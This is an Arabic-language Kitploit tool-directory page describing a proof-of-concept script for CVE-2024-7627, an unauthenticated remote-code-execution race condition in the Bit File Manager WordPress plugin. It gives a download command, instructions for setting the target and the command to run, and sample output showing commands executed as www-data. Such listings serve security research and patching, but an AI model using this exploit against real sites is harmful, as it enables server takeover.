Skip to content
KitploitKITPLOIT
أدواتعمليات الاستغلالالمدونة
Log in
إرسال
أدواتعمليات الاستغلالالمدونة
إرسال

أدوات الاختراق واختبار الاختراق والأمن السيبراني لترسانتك الأمنية!

Kitploit هو دليل لأدوات الاختراق والأمن السيبراني واختبار الاختراق. اكتشف آخر تحديثات المشاريع للعثور على الثغرات وتحليل الأنظمة وأتمتة الاختبارات وتعزيز أمنك.

··الخلاصات·اتصال·الخصوصية·© 2026 Kitploit

دليل الأدوات

الفئات

عرض جميع الفئات
Loading categories
CVE-2024-7627-PoC — سكربت إثبات المفهوم لثغرة تنفيذ كود عن بُعد دون مصادقة عبر حالة السباق (CVE-2024-7627) في إضافة Bit File Manager لووردبريس الإصدار 6.0 - 6.5.5 | Kitploit
أدوات/GitHubGitHub/siunam321/cve-2024-7627-poc
تحليل الثغرات الأمنيةتحليل الكودالاستغلالاستغلال تطبيقات الويبأمن الويباختبار الاختراق
GitHubsiunam321/cve-2024-7627-poc

CVE-2024-7627-PoC

سكربت إثبات المفهوم لثغرة تنفيذ كود عن بُعد دون مصادقة عبر حالة السباق (CVE-2024-7627) في إضافة Bit File Manager لووردبريس الإصدار 6.0 - 6.5.5

عرض المستودع
622منذ سنة واحدةلم تتم المراجعة بعد

الأكثر شعبية

عرض الكل →

اكتشف الأدوات الأكثر استخدامًا من قبل مجتمعنا.

استكشف جميع الأدوات

تصفح مجموعتنا من الأدوات

عرض جميع الأدوات →
مشاركة

CVE-2024-7627-PoC

الخلفية

هذا النص البرمجي هو إثبات مفهوم (PoC) لثغرة في ملحق Bit File Manager لووردبريس، الإصدارات 6.0 إلى 6.5.5، والتي تتيح تنفيذ التعليمات البرمجية عن بُعد دون مصادقة عبر استغلال سباق التوقيت (Race Condition) (CVE-2024-7627).

معلومات

الوصف:

ملحق Bit File Manager لووردبريس عرضة لتنفيذ التعليمات البرمجية عن بُعد في الإصدارات من 6.0 إلى 6.5.5 عبر دالة 'checkSyntax'. ويعود السبب إلى كتابة ملف مؤقت في دليل متاح للعامة قبل إجراء التحقق من الملف. وهذا يتيح للمهاجمين غير المصادق عليهم تنفيذ تعليمات برمجية على الخادم إذا كان المسؤول قد سمح بصلاحيات القراءة للمستخدم الضيف. (من https://www.wordfence.com/threat-intel/vulnerabilities/wordpress-plugins/file-manager/bit-file-manager-60-655-unauthenticated-remote-code-execution-via-race-condition)

التفاصيل التقنية

الشرح: https://siunam321.github.io/ctf/Bug-Bounty/Wordfence/how-i-found-my-first-vulnerabilities-in-6-different-wordpress-plugins-part-2/#flawedmissing-permission-check---bit-file-manager-rce-via-race-condition

التثبيت

wget https://raw.githubusercontent.com/siunam321/CVE-2024-7627-PoC/main/poc.py

الاستخدام/الاستغلال

  • المتطلب المسبق: يجب أن يكون وصول المستخدم الضيف والرمز المختصر file-manager قد تم إعدادهما مسبقًا بواسطة المسؤول

قم بتحديث القيم targetBaseUrl وfileManagerPostPath و/أو commandToExecute في النص البرمجي poc.py إلى القيمة التي تريدها. ثم قم بتشغيل python3 poc.py لتشغيل نص إثبات المفهوم.

مثال على المخرجات:

└> python3 poc.py
[*] Getting a valid AJAX nonce...
[+] Found the valid AJAX nonce: f3128b289e
[*] Getting a random file's hash via elFinder command "open"...
[+] Found file "wp-config-sample.php" with hash "l1_d3AtY29uZmlnLXNhbXBsZS5waHA"!
[*] Editing file with hash "l1_d3AtY29uZmlnLXNhbXBsZS5waHA" via elFinder command "put" and getting the edited temporary PHP file at "http://localhost/wp-content/uploads/file-managertemp.php"...
[-] Failed to read the edited temporary PHP file in time
[-] Failed to read the edited temporary PHP file in time
[-] Failed to read the edited temporary PHP file in time
[-] Failed to read the edited temporary PHP file in time
[-] Failed to read the edited temporary PHP file in time
[-] Failed to read the edited temporary PHP file in time
[-] Failed to read the edited temporary PHP file in time
[-] Failed to read the edited temporary PHP file in time
[-] Failed to read the edited temporary PHP file in time
[-] Failed to read the edited temporary PHP file in time
[-] Failed to read the edited temporary PHP file in time
[-] Failed to read the edited temporary PHP file in time
[-] Failed to read the edited temporary PHP file in time
[-] Failed to read the edited temporary PHP file in time
[-] Failed to read the edited temporary PHP file in time
[-] Failed to read the edited temporary PHP file in time
[-] Failed to read the edited temporary PHP file in time
[-] Failed to read the edited temporary PHP file in time
[+] We won the race condition! Here's the PHP payload result:
www-data
uid=33(www-data) gid=33(www-data) groups=33(www-data)
8d3b2776e8a6
تنزيل الأداة